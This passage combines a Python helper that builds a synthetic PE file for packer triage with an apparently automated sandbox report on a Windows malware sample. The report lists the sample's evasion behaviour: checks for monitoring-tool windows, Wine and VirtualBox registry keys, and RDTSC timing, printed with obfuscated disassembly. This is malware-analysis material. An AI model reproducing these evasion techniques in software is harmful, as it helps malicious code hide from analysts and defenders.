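    """Constructed two-section PE32 image, not the analysed sample: a flat .text and a
    high-entropy RWX section named 'isktfjdo' that contains the entry point."""
    sections = [(b".text", 0x1000, b"\x90" * 0x200, 0x60000020),            # CODE|EXEC|READ
                (b"isktfjdo", 0x2000, bytes(range(256)) * 16, 0xE0000040)]  # DATA|EXEC|READ|WRITE
    hdr = bytearray(0x200)
    hdr[0:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                 # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = 0x58                                                              # optional header start
    struct.pack_into("<H", hdr, opt, 0x10B)                                 # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, entry_rva)
    struct.pack_into("<III", hdr, opt + 28, 0x400000, 0x1000, 0x200)        # ImageBase, alignments
    struct.pack_into("<II", hdr, opt + 60, len(hdr), stored_checksum)      # SizeOfHeaders, CheckSum
    body, raw_ptr = bytearray(), len(hdr)
    for i, (name, va, data, chars) in enumerate(sections):
        off = opt + 0xE0 + 40 * i
        hdr[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", hdr, off + 8, len(data), va, len(data), raw_ptr)
        struct.pack_into("<I", hdr, off + 36, chars)
        body, raw_ptr = body + data, raw_ptr + len(data)
    return bytes(hdr + body)


if __name__ == "__main__":
    for finding in triage(build_sample_pe(0x2010, 0x1234)):
        print(finding)
```

Two caveats when using this on real files. A checksum of zero in the header is not a finding: the linker only fills it in for drivers and signed images, so most unsigned user-mode binaries carry zero; only a non-zero value that disagrees with the computed one, as with 0x1ca473 versus 0x1c90bc above, indicates the file was modified after linking. And entropy alone does not separate packed code from legitimately compressed resources, which is why the entry-point location and the section rights are checked alongside it.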

                Boot Survival

Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\0WO49yZcDA.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: FC7FD3 second address: FC78AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F65CC527CA3h 0x0000000d jmp 00007F65CC527CA1h 0x00000012 push dword ptr [ebp+122D1609h] 0x00000018 jnc 00007F65CC527CABh 0x0000001e jno 00007F65CC527CA5h 0x00000024 call dword ptr [ebp+122D193Eh] 0x0000002a pushad 0x0000002b jmp 00007F65CC527CA9h 0x00000030 jmp 00007F65CC527CA6h 0x00000035 xor eax, eax 0x00000037 cmc 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D35E5h], eax 0x00000043 pushad 0x00000044 jmp 00007F65CC527C9Ah 0x00000049 jl 00007F65CC527C96h 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007F65CC527CA8h 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f jng 00007F65CC527C9Ch 0x00000065 or eax, dword ptr [ebp+122D36A1h] 0x0000006b sub dh, 00000013h 0x0000006e popad 0x0000006f lodsw 0x00000071 mov dword ptr [ebp+122D1BF6h], edx 0x00000077 mov dword ptr [ebp+122D1BF6h], eax 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1BF6h], eax 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b je 00007F65CC527CAFh 0x00000091 pushad 0x00000092 jmp 00007F65CC527CA1h 0x00000097 or eax, 1D1614C5h 0x0000009d popad 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jp 00007F65CC527C98h 0x000000a7 pushad 0x000000a8 popad 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: FC78AE second address: FC78B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: FC78B4 second address: FC78B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: FC78B8 second address: FC78BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11448DC second address: 11448EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F65CC527C96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11448EA second address: 11448F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11448F5 second address: 11448F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11448F9 second address: 11448FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 112F644 second address: 112F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 112F648 second address: 112F652 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1143AE8 second address: 1143AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1143AED second address: 1143B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEF5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1143B07 second address: 1143B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F65CC527CA8h 0x00000010 pop edi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1143B2E second address: 1143B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F65CD2EDEECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11459EB second address: FC78AE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65CC527C9Ch 0x00000008 js 00007F65CC527C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 60B6FEA5h 0x00000017 mov dword ptr [ebp+122D2D8Fh], edx 0x0000001d push dword ptr [ebp+122D1609h] 0x00000023 jmp 00007F65CC527CA5h 0x00000028 call dword ptr [ebp+122D193Eh] 0x0000002e pushad 0x0000002f jmp 00007F65CC527CA9h 0x00000034 jmp 00007F65CC527CA6h 0x00000039 xor eax, eax 0x0000003b cmc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 stc 0x00000041 mov dword ptr [ebp+122D35E5h], eax 0x00000047 pushad 0x00000048 jmp 00007F65CC527C9Ah 0x0000004d jl 00007F65CC527C96h 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007F65CC527CA8h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 jng 00007F65CC527C9Ch 0x00000069 or eax, dword ptr [ebp+122D36A1h] 0x0000006f sub dh, 00000013h 0x00000072 popad 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D1BF6h], edx 0x0000007b mov dword ptr [ebp+122D1BF6h], eax 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D1BF6h], eax 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f je 00007F65CC527CAFh 0x00000095 pushad 0x00000096 jmp 00007F65CC527CA1h 0x0000009b or eax, 1D1614C5h 0x000000a1 popad 0x000000a2 push eax 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 jp 00007F65CC527C98h 0x000000ab pushad 0x000000ac popad 0x000000ad rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145A6E second address: 1145AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F65CD2EDEE6h 0x00000009 jng 00007F65CD2EDEE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 3949C6A8h 0x00000019 mov esi, edi 0x0000001b push 00000003h 0x0000001d mov ch, bh 0x0000001f push 00000000h 0x00000021 mov si, dx 0x00000024 mov edi, dword ptr [ebp+122D348Dh] 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F65CD2EDEE8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov si, 04FEh 0x0000004a push AC8AC074h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 js 00007F65CD2EDEE6h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145BA3 second address: 1145BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145BA7 second address: 1145BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F65CD2EDEE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3571h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2F8Bh], ebx 0x00000032 push B03B9AB5h 0x00000037 pushad 0x00000038 pushad 0x00000039 jmp 00007F65CD2EDEECh 0x0000003e ja 00007F65CD2EDEE6h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145CBB second address: 1145CD0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65CC527C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145D3C second address: 1145D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145D44 second address: 1145D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 35505400h 0x0000000d mov di, si 0x00000010 push 00000003h 0x00000012 sbb esi, 4A130D52h 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D3719h] 0x00000020 mov edx, dword ptr [ebp+122D34D9h] 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D3135h], eax 0x0000002e call 00007F65CC527C99h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145D82 second address: 1145D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1145D87 second address: 1145DA5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F65CC527C96h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F65CC527C9Bh 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11673E7 second address: 11673EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11673EB second address: 11673EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11673EF second address: 11673FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65CD2EDEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11651AD second address: 11651BB instructions: 0x00000000 rd tsc 0x00000002 jmp 00007F65CC527C9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1165321 second address: 1165339 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65CD2EDEEFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1165489 second address: 11654AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F65CC527C9Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11654AC second address: 11654C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65CD2EDEF0h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 11654C9 second address: 11654D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1165615 second address: 1165628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jng 00007F65CD2EDEECh 0x0000000d jg 00007F65CD2EDEE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 1165628 second address: 116562E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116562E second address: 116564A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11657FE second address: 1165808 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165808 second address: 1165837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF4h 0x00000009 jmp 00007F65CD2EDEF7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165837 second address: 116583B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165DB6 second address: 1165DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165DC7 second address: 1165DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1166D72 second address: 1166D78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116973D second address: 1169741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1169741 second address: 1169769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F65CD2EDEEAh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F65CD2EDEECh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C0EF second address: 112C100 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CC527C98h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C100 second address: 112C13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65CD2EDEE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F65CD2EDEF5h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C13F second address: 112C149 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F188 second address: 116F18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F64D second address: 116F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65CC527CA2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F67B second address: 116F688 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F7FC second address: 116F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F806 second address: 116F82E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push ebx 0x0000000e jc 00007F65CD2EDEE6h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEEEh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F82E second address: 116F842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CC527C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F93B second address: 116F93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F93F second address: 116F95D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65CC527C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jnl 00007F65CC527C96h 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173B56 second address: 1173B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173D03 second address: 1173D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007F65CC527C96h 0x0000000b jmp 00007F65CC527C9Eh 0x00000010 jp 00007F65CC527C96h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007F65CC527C96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173D2D second address: 1173D75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F65CD2EDEF6h 0x00000010 jmp 00007F65CD2EDEECh 0x00000015 jne 00007F65CD2EDEE6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jc 00007F65CD2EDEF2h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jmp 00007F65CD2EDEEAh 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117405B second address: 1174063 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174063 second address: 1174069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174069 second address: 117406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174351 second address: 1174387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F65CD2EDEEEh 0x0000000b pop edx 0x0000000c je 00007F65CD2EDF25h 0x00000012 jl 00007F65CD2EDEF8h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F65CD2EDEF0h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175A07 second address: 1175A14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D0E second address: 1175D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D99 second address: 1175D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D9F second address: 1175DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175E88 second address: 1175E8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175E8E second address: 1175E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117637F second address: 1176383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
